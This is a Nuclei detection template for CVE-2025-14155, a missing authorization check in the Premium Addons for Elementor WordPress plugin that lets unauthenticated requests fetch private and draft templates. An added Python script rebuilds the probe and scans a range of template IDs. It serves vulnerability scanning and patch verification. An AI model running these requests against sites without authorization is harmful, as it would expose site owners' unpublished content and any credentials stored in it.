id: CVE-2025-14155

info:
  name: Premium Addons for Elementor - Unauthenticated Information Disclosure
  author: DhiyaneshDk
  severity: medium
  description: |
    Premium Addons for Elementor plugin for WordPress version 4.11.53 and below contains an unauthenticated information disclosure vulnerability. The vulnerability exists due to a missing authorization check in the get_template_content() AJAX handler, allowing unauthenticated attackers to retrieve private, draft, and pending Elementor templates that may contain sensitive information such as API keys, credentials, customer data, or unpublished content.
  impact: |
    Unauthenticated attackers can view private and unpublished template content, leading to sensitive data disclosure.
  remediation: |
    Update to a version later than 4.11.53.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-14155
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/135c33bb-5ec2-4697-9340-1d2651ff3a0b?source=cve
    - https://plugins.trac.wordpress.org/browser/premium-addons-for-elementor/tags/4.11.53/includes/addons-integration.php#L1624
    - https://plugins.trac.wordpress.org/changeset/3416254/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-14155
    cwe-id: CWE-862
    epss-score: 0.0049
    epss-percentile: 0.65901
    cpe: cpe:2.3:a:leap13:premium_addons_for_elementor:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: leap13
    product: premium_addons_for_elementor
    framework: wordpress
    publicwww-query: "/wp-content/plugins/premium-addons-for-elementor/"
  tags: cve,cve2025,wordpress,wp-plugin,premium-addons-elementor,unauth,disclosure,wp,vkev

variables:
  template_id: "{{rand_int(1, 100)}}"

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=get_elementor_template_content&templateID={{template_id}}&is_id=true HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        X-Requested-With: XMLHttpRequest
        Referer: {{RootURL}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - '"template_content"'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 490a00463044022012a4ab1353cb59308e13f7372757ef8acdaae653a93ebc9b214a3ad60883149402207af70dff6af50013db3f6f4fca3f9e45bb85a98ecd204664ea0b527bb7db0e9f:922c64590222798bb761d5b6d8e72950
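The template sends one request with a random template ID between 1 and 100 and declares a hit only when all three matchers agree. The script below is an added example, not part of the template or of the plugin: it rebuilds the same admin-ajax.php GET and the same AND-ed matcher logic in plain Python so the check can be read, unit-tested offline, and pointed at a site you are authorized to test. Because a single random ID can miss (the ID may not exist, or may belong to a published template), `scan()` walks a range of IDs instead of sending one request. The sample responses are constructed for illustration; the exact JSON shape the plugin returns (in particular where `template_content` sits) is an assumption, which is why the matcher, like the template, only does substring checks.

```python
"""Stand-alone reproduction of the Nuclei template's check for CVE-2025-14155.

Added example; not the template's own code and not the plugin's code.
Mirrors the template's request and its three AND-ed matchers.
"""
import json
import sys
import urllib.error
import urllib.parse
import urllib.request

AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "get_elementor_template_content"  # AJAX action from the template's raw request


def build_probe_url(root_url: str, template_id: int) -> str:
    """Build the same admin-ajax.php GET the template sends."""
    query = urllib.parse.urlencode(
        {"action": ACTION, "templateID": str(template_id), "is_id": "true"}
    )
    return root_url.rstrip("/") + AJAX_PATH + "?" + query


def matches(status: int, content_type: str, body: str) -> bool:
    """Apply the template's matchers with matchers-condition: and.

    - status must be 200
    - Content-Type must contain application/json
    - body must contain both '"success":true' and '"template_content"'
    """
    if status != 200:
        return False
    if "application/json" not in content_type:
        return False
    return '"success":true' in body and '"template_content"' in body


def probe(root_url: str, template_id: int, timeout: float = 10.0):
    """Send one unauthenticated probe; return (status, content_type, body)."""
    req = urllib.request.Request(
        build_probe_url(root_url, template_id),
        headers={
            "Accept": "application/json, text/javascript, */*; q=0.01",
            "X-Requested-With": "XMLHttpRequest",
            "Referer": root_url,
        },
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
            return resp.status, resp.headers.get("Content-Type", ""), body
    except urllib.error.HTTPError as err:
        # Non-2xx responses (e.g. 400 for an unknown action) still carry a body.
        body = err.read().decode("utf-8", "replace")
        return err.code, err.headers.get("Content-Type", ""), body


def scan(root_url: str, ids=range(1, 101)):
    """Probe a range of template IDs rather than one random one.

    Returns the first template ID whose response satisfies the matchers,
    or None if no probe in the range matched.
    """
    for template_id in ids:
        status, ctype, body = probe(root_url, template_id)
        if matches(status, ctype, body):
            return template_id
    return None


# Constructed sample responses (assumed shapes, not captured from a real site).
# WordPress's wp_send_json() emits compact JSON, hence the '"success":true' form.
VULNERABLE_RESPONSE = (
    200,
    "application/json; charset=UTF-8",
    json.dumps(
        {"success": True, "data": {"template_content": "<div>draft template markup</div>"}},
        separators=(",", ":"),
    ),
)
UNAUTHORIZED_RESPONSE = (
    200,
    "application/json; charset=UTF-8",
    json.dumps({"success": False, "data": "Unauthorized"}, separators=(",", ":")),
)
UNKNOWN_ACTION_RESPONSE = (400, "text/html; charset=UTF-8", "0")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: python cve_2025_14155_check.py https://target.example")
    hit = scan(sys.argv[1])
    print("vulnerable (template ID %s)" % hit if hit is not None else "no match in ID range")
```

A negative result from the single randomized request the template sends is not proof of absence; run the range scan, or supply the ID of a known private or draft template, before concluding a site is patched.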